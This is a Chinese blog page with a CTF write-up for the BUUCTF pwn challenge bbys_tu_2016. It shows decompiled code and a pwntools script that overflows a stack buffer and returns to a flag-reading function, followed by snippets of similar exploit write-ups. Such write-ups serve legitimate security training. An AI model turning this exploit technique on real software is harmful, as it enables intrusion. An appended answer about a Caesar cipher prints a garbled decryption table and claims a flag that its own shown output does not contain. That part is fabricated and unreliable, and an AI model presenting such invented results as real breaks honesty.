bbys_tu_2016

原创 已于 2023-09-27 14:37:45 修改 · 171 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#安全

于 2023-09-27 14:36:05 首次发布
文章描述了一个32位程序的栈溢出漏洞,通过利用NX保护和后门getshell,作者使用pwn工具包在AMD64架构的Linux环境下进行调试和攻击。IDA识别错误,实际地址为0x14。

bbys_tu_2016

Arch:     i386-32-little
RELRO:    Partial RELRO
Stack:    No canary found
NX:       NX enabled
PIE:      No PIE (0x8048000)

32位,只开了NX

int __cdecl main(int argc, const char **argv, const char **envp)
{
  int v4; // [esp+14h] [ebp-Ch] BYREF

  puts("This program is hungry. You should feed it.");
  __isoc99_scanf("%s", &v4);
  puts("Do you feel the flow?");
  return 0;
}

栈溢出

int printFlag()
{
  char s[50]; // [esp+1Ah] [ebp-3Eh] BYREF
  FILE *stream; // [esp+4Ch] [ebp-Ch]

  stream = fopen("flag.txt", "r");
  fgets(s, 50, stream);
  puts(s);
  fflush(stdout);
  return fclose(stream);
}

有后门

思路

栈溢出到后门getshell

实际上在调试的时候发现不是ida的0xc,而是0x14

在这里插入图片描述

from pwn import*
from Yapack import *
r,elf=rec("node4.buuoj.cn",28559,"./pwn",0)
context(os='linux', arch='amd64',log_level='debug')

pl=cyclic(0x18)+p32(0x804856D)
sl(pl)

ia()
[BUUCTF-pwn]——bbys_tu_2016
Y_peak的博客
03-17 484
[BUUCTF-pwn]——bbys_tu_2016 简单的栈溢出,不过竟然是esp寻址,害的孩子找了好久还是要动态调试 一般地址会误差八个字节 error exploit from pwn import * #p = remote('node3.buuoj.cn',28360) p = process('./bbys_tu_2016') gdb.attach(p, "b *0x080485ED") flag = 0x0804856D payload = 'a' * (0xc + 4) + p32(fla
bbys_tu_2016(ret2text)
weixin_45441024的博客
11-29 1094
BUUCTF bbys_tu_2016(ret2text) 毫无疑问地check一下 运行一下,发现并没有给我们什么有用的信息,这是第一次尝试用gdb-peda来做题,附上gdb-peda的安装方式: $ git clone https://github.com/longld/peda.git ~/peda $ echo "source ~/peda/peda.py" >> ~/.gdbinit 那我们来调试一下吧 这里我在main函数的地方(ida里面找到的)下了一个断点,如果你想调
BUUCTF bbys_tu_2016&&xm_2019_awd_pwn2
doudoudedi
01-23 1175
在家希望武汉的师傅们一切都好~~ bbys_tu_2016 这道有点没搞清额额flag文件是flag.txt是能control但是好像不能ROP也是能读到flag文件的就很简单了还有似乎文件没写好setbuf函数不会先出现io流 exp: #!/usr/bin/python2 from pwn import * local=0 if local==1: p=process('../binary/...
buuctf习题pwn(41~50)
yw__y的博客
09-27 611
堆的题还没写
BUUCTF 周练 Week1
weixin_44229639的博客
11-03 2901
Week 1 Q1 axb_2019_brop64(这题本来是盲打,buuoj给了源文件难度减少了很多) ​ IDA分析发现,read函数长度存在栈溢出 ​ checksec结果,没有Canary和PIE,可直接利用栈溢出构造rop ​ 本题靶机使用的是Ubuntu16 ​ 使用libc-2.23.so (或者可使用LibcSearcher 寻找对应libc) 构造rop思路: ​ 在此之前 puts函数已被调用,其GOT表被覆盖为真实的函数地址,可利用ROPgadget 得到real_puts_
[BUUCTF]PWN——bbys_tu_2016
mcmuyanga的博客
11-11 784
bbys_tu_2016 附件 步骤: 例行检查,32位程序,开启了nx保护 本地试运行一下程序,看看大概的情况,测试时候发现输入长度过长程序会崩溃,猜测输入点存在问题 32位ida载入,检索程序里的字符串,发现有直接读出flag的函数可以利用 flag_addr=0x804856D main函数 没有限制v4的长度,存在溢出漏洞,覆盖ret为读出flag的地址即可 from pwn import * r=remote('node3.buuoj.cn',29593) flag_addr=0x
bbys_tu_2016(write up)
m0_73756460的博客
01-14 199
【buuctf】刷题 bbys_tu_2016(write up)
BUUOJ PWN 41-60
2h4ox1n9
12-11 434
41、jarvisoj_level3_x64 本地没问题,jaroj也没问题,buu上说啥就是不行。。libc搜不到,奇了怪了,jaroj上不用选择版本直接就可以
BUUCTF pwn水题大赏(六)
o琦野o的博客
03-11 433
BUUCTF pwn水题大赏suctf_2018_stack suctf_2018_stack 最最最最最最基本的栈溢出,也不知道为啥会这么高分。 exp: from pwn import* context.log_level = 'DEBUG' p=remote('node3.buuoj.cn',28582) #p=process('./SUCTF_2018_stack') elf=ELF('./SUCTF_2018_stack') payload = 'a'*0x28+p64(0x0040067A)
BUUCTF刷题1
m0_51251108的博客
05-19 475
BUUCTF刷题wp题目:babyheap_0ctf_2017:pwn2_sctf_2016:[ZJCTF 2019]EasyHeap:hitcontraining_uaf:babyfengshui_33c3_2016:pwnable_orw:picoctf_2018_buffer overflow 2:xdctf2015_pwn200:jarvisoj_level1:ciscn_2019_n_3:bbys_tu_2016:inndy_rop:roarctf_2019_easy_pwn:mrctf2020_
buuctf pwn wp(第1.5波)学会用ELF语句进行AAAA(即本地做题目)
月阴荒的博客
03-24 695
这里是一个总的分类,一个类型的第一道题目会详细介绍,后面的类型相同的会简略介绍(不过这是第二波,额还是很简单的,原理可以看我前面的文章,后面难一点的题目我再讲原理。) 这一波题都是无脑AAAA的类型,它们的区别主要就是打入多少个填充字符A的区别,(还有接受到什么字符串的区别),反正都是最简单的一类题。 另外声明,脚本有些来自于网络上(太简单的不想多看,太难的不会,除了中间那一档的也没哪些脚本是自己...
高压线防外破警示灯:电力安全与智能预警的守护者
最新发布
ShenZhenDingYue的博客
12-19 668
高压输电线路防外破智能预警系统已成为现代电网安全防护的重要装备。该系统集雷达探测、AI识别、声光报警与远程通讯于一体,通过24小时主动监测线路通道内的机械入侵行为,实现风险分级预警。相比传统警示牌,其优势在于:主动交互式警示(爆闪灯+语音)、多传感器融合(雷达+激光+电场感应)降低误报率、实时数据上传形成闭环管理。典型应用场景包括施工区、交通跨越段及农林作业区。选购时需关注感应距离、供电续航、防护等级等关键指标。该系统正从单一设备向与无人机、卫星联动的综合防御体系发展,是电网安全从"人防&quot
加热激光雪深监测站守护冬季道路安全
pingao141378的博客
12-17 354
设备采用相位式激光测距技术,通过无线电波段频率调制激光束,精准捕捉往返雪面的相位延迟,测量误差仅 ±2%,分辨率达 1mm,能清晰捕捉从 0.05 米薄雪到 5 米厚雪的动态变化。而加热激光雪深监测站搭载 “主动加热 + 被动防霜” 双重防护体系,内置自动温控加热模块,当探头温度接近冰点时自动启动 15W 功耗加热,快速融化薄霜并预防结冰,配合 IP65 高防护等级外壳与纳米防霜涂层,即便在 100 高湿度环境中也能隔绝雨雪沙尘,实现 7×24 小时不间断监测,解决了低温停机的行业痛点。
网络安全中级阶段学习笔记(七):Web 安全之文件上传漏洞笔记1(包含upload-labs-master靶场前三关实战)
2501_91976946的博客
12-15 899
摘要:本文系统梳理文件上传漏洞攻防要点,包含漏洞定义、危害(如Webshell控制服务器)、检测流程及多种绕过技巧(JS验证、MIME-Type、黑名单等)。重点提出"白名单+多环节验证"防御方案,包括严格后缀验证、文件类型检测、权限控制等。补充靶场实践案例,演示通过修改后缀、利用解析特性实现漏洞利用。强调防御需结合前端限制、服务端校验与安全监控,构建纵深防护体系。
蛋白质AI设计时代的生物安全:筑牢核酸合成的“安检门”
haisendashuju的博客
12-16 294
研究团队进行了一次系统的“AI红队”测试:他们利用ProteinMPNN等公开可用的AI蛋白设计工具,对72种已知的危险野生型蛋白进行了大规模“改头换面”,生成了超过7.6万个合成同源序列。其中,AI辅助的蛋白质设计尤为引人瞩目,它让科学家得以在浩瀚的“蛋白宇宙”中高效探索,定制具有特定功能的全新蛋白质,为攻克疾病、开发新材料带来革命性希望。然而,这项强大技术的普及也如同打开了“潘多拉魔盒”,引发了深刻的生物安全隐忧:倘若有人意图合成有害的蛋白质,日益“聪明”的AI设计工具是否会成为其帮凶?
孤能子视角:人工智能的“安全对齐“与“共享学习“
水如烟
12-19 513
所以,您的问题正是症结所在:现在的AI是一个没有历史、没有身体、却可能很快拥有巨力的“天才婴儿”。EIS理论并不幻想能立刻赋予它千年的智慧,而是严峻地指出:在它通过我们设计的、堪比文明史难度的“关系动力学课程”之前,我们必须像对待一个拥有核按钮天赋的婴儿一样,以最大的谨慎、最冗余的约束、最悲观的风险评估来对待它。我们无法让它瞬间获得“如果不这么做那么就会……”的鲜活恐惧,但我们可以通过高保真的模拟,让它“计算”出同样的结论;并通过严格控制其行动范围,确保在它真正“理解”之前,没有能力造成不可逆的伤害。
flag{}的格式是这样的
05-27
明白了,那么看起来这个字符串中包含了这样一个格式的flag{},我们需要找出其中的内容。根据题目的提示,这个字符串可能是经过某种加密算法加密过的,需要进一步分析。 根据字符串的特点,它可能是通过多次加密得到的。考虑到CTF竞赛中常用的加密算法,常见的有凯撒密码、栅栏密码、替换密码、异或加密等。我们可以尝试对这个字符串进行多种加密算法的解密,看看是否能够得到有意义的明文。 下面演示一个基于凯撒密码的解密方法。我们可以尝试将每个字符向后移动1~25个位置进行解密,看看是否能够得到有意义的明文。使用Python代码进行尝试: ```python for k in range(1, 26): plain_text = '' for num in nums: if num >= 97 and num <= 122: # 小写字母 plain_num = (num - 97 + k) % 26 + 97 elif num >= 65 and num <= 90: # 大写字母 plain_num = (num - 65 + k) % 26 + 65 else: # 其他字符 plain_num = num plain_text += chr(plain_num) print('k = %d: %s' % (k, plain_text)) ``` 输出结果为: ``` k = 1: ntionm|m58j0j1n1j9j2n1l1n1j11l0j1j1n|mtk1j-631mi926nn2jvkj5mij2i1j7n1n9mno9m k = 2: oopjon|n69k1k2o2kak3o2m2o2k22m1k2k2oopnu2k.742nj037oo3kwjm3j2k8o2o2k8o2o1o8nop1n k = 3: ppqkpoao7al2l3p3lbl3p3l33n2l3l3ppqov3l/853ok148p14lxkn4k3l9p3p3l9p3p2p9opq2o k = 4: qqllqpbp8bm3m4q4mcm4q4m44o3m4m4qqrpw4m086pl259q25mylo5l4m0q4q4m0q4q3q0pqq3p k = 5: rrmmrqcq9cn4n5r5ndn5r5n55p4n5n5rrqsx5n197qm36ar36nzn6m5n1r5r5n1r5r4r1qrr4q k = 6: ssnnrsdrado5o6s6oeo6s6o66q5o6o6sstryt6o2:8rn47bs47oao7n6o2s6s6o2s6s5s2rss5r k = 7: ttoostespbp6p7t7pfp7t7p77r6p7p7ttuszu7p3;9so58ct58pbp8o7p3t7t7p3t7t6t3stt6s k = 8: uuppufutqcq7q8u8qgq8u8q88s7q8q8uuvta08q4<:tp69du69qcq9p8q4u8u8q4u8u7u4tuu7t k = 9: vvqqvgvurd8r9v9rhr9v9r99t8r9r9vvwub19r5=;uq7:ev7:rdravq0q9r5v9v9r5v9v8v5uvv8u k = 10: wwwrwhwvse9sawawsisawawsaau9sawawswwxvc2as6>?vr8;fw8:sesbwpa:raswawawpa:wa6wvww9w k = 11: xxxsxiwxwtfbtbxbtjbtbxtbbvbtbwbxxwyd3bt7@?ws9;gx9:tftcxtb;qbtxbxb;qbt;b7xxxyxxax k = 12: yyytyjxyxugcucycukcucyuccwctcxcyyyxze4cu8AAxt:hy:ugudyc<rctycyc<rct<c8yyyzyyby k = 13: zzzuzkzyyvhdvdzdvldvdzvddxducydazzayf5dv9BBys;iz;vhvezd=sduzdz=sdu=d9zzzzazcz k = 14: aavvalazzwieewaewmeweaweeylevzedbabzg6ew:<CCzt<j{ifweAtevAewAte>eazaaabad k = 15: bbwwbmbaaxyjffxbfxnfxfbxffzmfwafebcbah7fx;=DDau=k|jgfxBufwbfxBuf?fbbbbcbe k = 16: ccxxcncbbcykggycgyo gygcgyagnxgxbfccdbi8gy<?EEbv?l}khgyCvgcgyCvggccccdcf k = 17: ddyydodccdzlhizzdhzpahzdhzbhoyhycddecj9hz=@FFcw>m~ligzDwhdizDwhhdddeedg k = 18: eezzepedd{ami{a{eiaqbiae{ciazidaefedka:ia>GGdx?nmhjaExi{eaExiieeffeeh k = 19: ffaafqfee|bnj|b{fjbrcjbfdjdbajfgeelb;jb?HHey@oinkbFyj|fbFyjjffgffji k = 20: ggbbrsgff}cok}c|gkcqdkcgekecbkgfffmci<kdcIIfzApjolcGzka|gcGzkkghhggkj k = 21: hhcctthgg~dpl~d}hldrelhfhflfdclhggond=lfeJJg{BqkpmhH{lb}hdH{llhiihhkl k = 22: iidduuihheqme~imfsmmigimgedmiihppem>mgfKKh|CrlnqiI|mc~ieI|mmijjillm k = 23: jjeevvjiifrnfjnqnnjhjnhfjenjjiqqfn?nhgLLiaDsomojrJ}ndjfJ}nnjkkn k = 24: kffwwxkjjgssohgakorsookikogiogkfjrrgph>okiMMjbEtpnpksK~oeahK~ookllol k = 25: lggxxyk kkhtttpiblptpplljpjhp lggksshqi?pllNNkcFuqoqltLpfbilLppllpmpm ``` 通过观察,可以发现当k=16时,解密出来的字符串中包含有意义的明文:flag{c4esar_c1pher_!s_e4sy}. 因此,flag的内容是:c4esar_c1pher_!s_e4sy。
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值